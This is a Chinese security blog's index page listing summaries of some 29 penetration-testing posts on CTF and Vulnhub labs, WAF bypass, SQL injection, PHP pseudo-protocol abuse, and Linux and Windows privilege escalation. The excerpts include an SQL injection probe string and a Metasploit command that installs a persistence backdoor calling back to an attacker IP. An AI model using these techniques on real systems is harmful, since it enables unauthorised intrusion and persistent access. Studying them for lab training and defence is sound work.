自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

大方子

记录着自己的见闻【ms08067】【贝塔安全实验室】 ***有任何问题 请留言私信 空闲时间统一回复***

  • 博客(29)
  • 收藏
  • 关注

转载 免杀所有杀软的端口转发工具

平时在渗透测试中大家经常会用到内网渗透,然而内网渗透中很重要的一个步骤就是端口转发。常见的端口转发lcx.exe nc.exe Using php/jsp/aspx Script iptables端口转发 nginx端口转发 等等……其中lcx.exe、nc.exe以及使用脚本转发,都有可能被防护/杀毒软件拦截,而后者则略微有点麻烦(不会告诉你是因为我真懒!)我是一个非常喜...

2018-09-27 22:56:07 1296

转载 实战Linux下三种不同方式的提权技巧

在渗透测试或者漏洞评估的过程中,提权是非常重要的一步,在这一步,黑客和安全研究人员常常通过exploit,bug,错误配置来提升权限。本文的例子都是在虚拟机里测试的,不同的虚拟机可以从Vulnhub下载。实验一:利用Linux内核漏洞提权VulnOS version 2是VulHub上的一个Linux提权练习,当打开虚拟机后,可以看到  获取到低权限SHELL后我们通常做下...

2018-09-27 22:39:12 1331

原创 【Vulnhub系列】bulldog

===========================个人收获:1.dirb挖掘网页目录2.Linux 可以用&同时执行多条命令3.Kali利用Python搭建简单HTTP服务器4.python写的shell反弹脚本5.利用python pty模块的shell来进行交互============================下载地址:https://d...

2018-09-27 21:55:57 1845

转载 shell命令运行符号& ; &&区别

shell命令运行符号& ; &&区别 command1&command2&command3       [三个命令同时执行 ]   command1;command2;command3     [不管前面命令执行成功没有,后面的命令继续执行 ]   command1&&command2        ...

2018-09-27 15:53:54 2007

转载 如何绕过 Web 应用程序防火墙(WAF)?

在 Web 应用程序中发现远程命令执行漏洞并不罕见,「OWASP Top 10 2017」榜单中,把“注入”放在第一位,就可见一斑: 当攻击者把作为命令或查询的不可信数据发送给解释器时,会产生注入漏洞,如 SQL,NoSQL,OS 和 LDAP 注入。攻击者的数据可能会诱使解释器执行意外的命令或在没有授权的情况下访问数据。 所有现代 Web 应用防火墙都能拦截 RCE 尝试,但...

2018-09-23 10:21:07 4095

原创 教你怎么用Vulnhub来搭建环境

0x01 前言Vulnhub它是一个提供各种漏洞环境的平台,里面大部分的环境是要用VMware或者VirtualBox打开运行的。如果只是练习一些常见的漏洞可以看我另外两篇用Docker来搭建各种漏洞靶场(妈妈再也不用担心我没有靶场练习了)从CentOS安装Docker来搭建漏洞靶场到Joomla 3.4.5 反序列化漏洞复现(附批量Getshell脚本)0x02 下载https:/...

2018-09-22 13:57:29 25785 4

转载 Kali渗透测试——netdiscover

基于ARP的网络扫描工具netdiscoverARP是将IP地址转化物理地址的网络协议。通过该协议,可以判断某个IP地址是否被使用,从而发现网络中存活的主机。Kali Linux提供的netdiscover工具,就是借助该协议实施主机发现。它既可以以被动模式嗅探存活的主机,也可以以主动模式扫描主机。用户还可以根据网络稳定性,调整发包速度和数量。查看网络信息  扫描本地网络主...

2018-09-19 21:20:04 3467

转载 SQL注入点检查的一个小技巧

在测试一个网站的注入的时候,发现and和or,xor都不行,然后可以用这个方式检测注入,目前只有在MYSQL中测试成功 ?id = 1^(1=1)^1?id = 1'^(1=2)^'1  ...

2018-09-19 20:03:35 2268

转载 利用PHP中的phar伪协议绕过waf

可能有人已经早已经知道了,不过我也是一次在研究phar扩展的溢出漏洞时发现的一个技巧,就是利用phar:协议,这个协议可能在渗透过程中会帮你绕过一些东西。我能够想到的是有些waf不会防php后缀的文件,但是他会检测里面的内容,我们可以通过包含的方式,包含rar后缀或者phar后缀里面的txt文件或者jpg文件达到绕过防护的目的,具体我也时间细细的把玩。你们可以自己想想,怎样利用才是最好的。...

2018-09-14 21:38:03 2965

转载 四个实例递进php反序列化漏洞理解

索引最近在总结php序列化相关的知识,看了好多前辈师傅的文章,决定对四个理解难度递进的序列化思路进行一个复现剖析。包括最近Blackhat议题披露的phar拓展php反序列化漏洞攻击面。前人栽树,后人乘凉,担着前辈师傅们的辅拓前行!D0g3为了让大家进入状态,来一道简单的反序列化小题,新来的表哥们可以先学习一下php序列化和反序列化。顺便安利一下D0g3小组的平台...

2018-09-14 21:30:32 8261 3

转载 Powershell 提权框架-Powerup – Evi1cg

0x00 简介通常,在Windows下面我们可以通过内核漏洞来提升权限,但是,我们常常会碰到所处服务器通过内核漏洞提权是行不通的,这个时候,我们就需要通过脆弱的Windows服务提权,比如我们替换掉服务所依赖的DLL文件,当服务重启时,加载我们替换的DLL文件从而完成比如添加管理员账号的操作。或者通过常见的Mssql,Mysql等服务,通过其继承的系统权限来完成提权等等,而今天我将介绍一个非常...

2018-09-11 15:46:14 1489 1

转载 [红日安全]代码审计Day2 - filter_var函数缺陷

========================================个人收获:1.可用javascript伪协议来绕过xss过滤   ========================================  本文由红日安全成员: 七月火 编写,如有不当,还望斧正。前言大家好,我们是红日安全-代码审计小组。最近我们小组正在做一个PHP...

2018-09-07 11:11:13 626

转载 [红日安全]代码审计Day1 - in_array函数缺陷

==============================个人收获:1.在插入语句里面进行注入时,需要把前面valuesd的括号闭合2.in_array第三个参数没有开启的时候,可以通过(7websell)在强转为整数型后就等于7进行绕过    ==================================  前言大家好,我们是红日安全-代码...

2018-09-06 20:58:08 829 2

转载 工具| sqlmap payload修改之路(下)

原文地址:http://www.freebuf.com/column/161797.html 上周通过一个例子让大家大致了解了sqlmap 如何添加以及修改payload,本周就让我们通过完整地学习sqlmap与payload有关的xml文件下的payload文件,我们都知道sqlmap有6大探测注入类型的技术,分别是U: UNION query SQL injection(可联合查询...

2018-09-06 16:30:39 947

转载 工具| Sqlmap Payload修改之路(上)

前言事情的起因是这样的:斗哥经常会发现一些骚气十足的注入规则,不过想要发挥这些注入规则少不了编写py脚本,小表姐作为sqlmap神器的忠实粉丝,决定把斗哥发现的骚气注入规则添加到sqlmap里面于是就有了本次课题,文章采用倒序的方式详解sqlmap注入规则的修改之路。准备工作sqlmap的源码版本:1.1.8.5#dev测试环境:phpstudy(php5.5.38+Apache)...

2018-09-06 16:26:20 585

转载 玩得一手好注入之order by排序篇

0×00 背景看了之前Gr36_前辈在先知上的议题,其中有提到排序注入,这个在最近经常遇到这样的问题,所以先总结下order by 排序注入的知识。  0×01 环境信息测试环境:操作系统ubuntu0.14.04.1 MYSQL:5.5.55-0测试代码:<?php$mysql_server=”10.10.10.136″;$mysql_username=”r...

2018-09-06 15:24:24 8349

原创 网络安全实验室----脚本关-----第二关

  连接地址:http://lab1.xseclab.com/xss2_0d557e6d2a4ac08b749b61473a075be1/index.php题目: 因为要2秒内提交 ,只能用脚本获取flag import requestsurl = "http://lab1.xseclab.com/xss2_0d557e6d2a4ac08b749b61473a...

2018-09-06 14:52:08 1499

转载 php伪协议实现命令执行的七种姿势

文件包含函数:include、require、include_once、require_once、highlight_file 、show_source 、readfile 、file_get_contents 、fopen 、file 。首先归纳下常见的文件包含函数:include、require、include_once、require_once、highlight_file 、show_...

2018-09-06 14:46:00 1606

转载 PHP伪协议总结

0x00php://input//所有测试均allow_url_fopen=On,allow_url_include=On!!!php://input是个可以访问请求的原始数据的只读流。POST请求的情况下,最好使用php://input来代替$HTTP_RAW_POST_DATA,因为它不依赖于特定的php.ini指令。而且,这样的情况下$HTTP_RAW_POST...

2018-09-06 14:42:30 30869 4

转载 网络安全实验室----微笑一下就能过关

======================个人收获:1.php伪协议 ===================== 就想记录下题目,转载下别人的wp转载:https://blog.csdn.net/qq_40980391/article/details/81161956 微笑一下就能过关了题目描述解题思路1、点开题,  查看源码  发现有个源...

2018-09-06 11:24:49 1378

原创 网络安全实验室-------------------逗比验证码第二期

===========================个人收获:1.验证码验证成功一次后为空,可能绕过验证码验证 ===========================   先输入一次正确的验证码抓包然后在里面发送一次,之后把验证保持为空就可以绕过 然后用intruder爆破即可 python密码生成代码import itertoo...

2018-09-06 10:22:33 566

原创 百度杯2017年春秋欢乐赛-------------象棋

=============================个人收获:1.审查网页元素要仔细 ============================= 题目:  抓包的时候看到一些奇怪的信息 在审查元素的时候发现这个很明显是一个正则表达式,猜测应该就是flag文件的位置了flag的文件名称是由【abcmlyx】的其中2位+ctf+【0...

2018-09-04 22:32:47 1186

原创 “百度杯”CTF比赛 2017 二月场---------------include

================================个人收获:1.网页的输出不一定会出现在页面上,也可能在页面源码里面2.当php开启allow_url_include的时候,可以用php://input伪协议包含文件3.php://filter/read=convert.base64-encode/resource=[文件路径]函数读取文件内容4.php...

2018-09-04 20:49:46 1359

转载 allow_url_include和allow_url_fopen

allow_url_fopen没什么好说的,主要是allow_url_include 从PHP5.2开始allow_url_include就默认为Off了,而allow_url_fopen一直是On的,也没有什么人无聊的去打开allow_url_include吧不过还是了解一下比较好 当allow_url_include为On且allow_url_fopen为On的时候...

2018-09-04 20:27:23 6433

转载 PHP文件包含漏洞攻防实战(allow_url_fopen、open_basedir)

摘要PHP是一种非常流行的Web开发语言,互联网上的许多Web应用都是利用PHP开发的。而在利用PHP开发的Web应用中,PHP文件包含漏洞是一种常见的漏洞。利用PHP文件包含漏洞入侵网站也是主流的一种攻击手段。本文对PHP文件包含漏洞的形成、利用技巧及防范进行了详细的分析,并通过一个真实案例演示了如何利用PHP文件包含漏洞对目标网站进行渗透测试,最终成功获取到网站的WebShell。1....

2018-09-04 20:20:25 3180

转载 PHP函数register_shutdown_function的使用示例

某些情况下,我们需要在程序执行结束时,做一些后续的处理工作,这个时候,php的register_shutdown_function函数就可以帮我们来实现这个功能。函数简介当PHP程序执行完成后,自动执行register_shutdown_function函数,该函数需要一个参数,用来指定由谁处理这些后续的工作。其中,程序执行完成,分为以下几种情况:第一种:php代码执行过程中发生错误...

2018-09-03 10:08:03 487

转载 记一次峰回路转、柳暗花明辗转反侧,相当艰难的渗透测试

大家好,这几天混的浑浑噩噩的,幼儿园还没开学,所以没有课,天天呆在实验室,逛着论坛,无所事事。1号突然想起原来有个web有post注入,但是sqlmap无法注入出东西。正好马上有个比赛,那我就练练手工吧。0X00 收集信息aspx + iis7.5的环境,那么首先看到iis7.5就想到解析漏洞了,目测没有php环境,解析漏洞是不可能滴。猜测数据库是sqlserver,当然在这里只是猜测...

2018-09-02 23:44:35 658

原创 Kali 中 Persistence后门的使用

这里我就用最经典的漏洞ms08_067进行演示 靶机:192.168.193.128攻击机:192.168.193.135 这里我就省去ms08_067漏洞的使用过程,直接讲当ms08_067拿到shell之后的操作 这里我们已经拿到权限了 然后执行 run persistence -S -U -X -i 5 -p 446 -r 192.168.193.13...

2018-09-02 11:03:49 3512 3

原创 在Windows低权限下利用服务进行提权

先介绍下一个工具---------->AccessChkAccessChk是Sysinternals中的小工具,推荐用3.0版本的,新版存在一些bug。利用这个工具用来检查用户和用户组对文件,目录,注册表项,全局对象和系统服务的权限,在实际配置权限过程中,如果权限设置不当,那么win服务就可能被用于提权 AccessChk的具体介绍可以看这:http://blog.51cto...

2018-09-01 10:48:06 4202

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除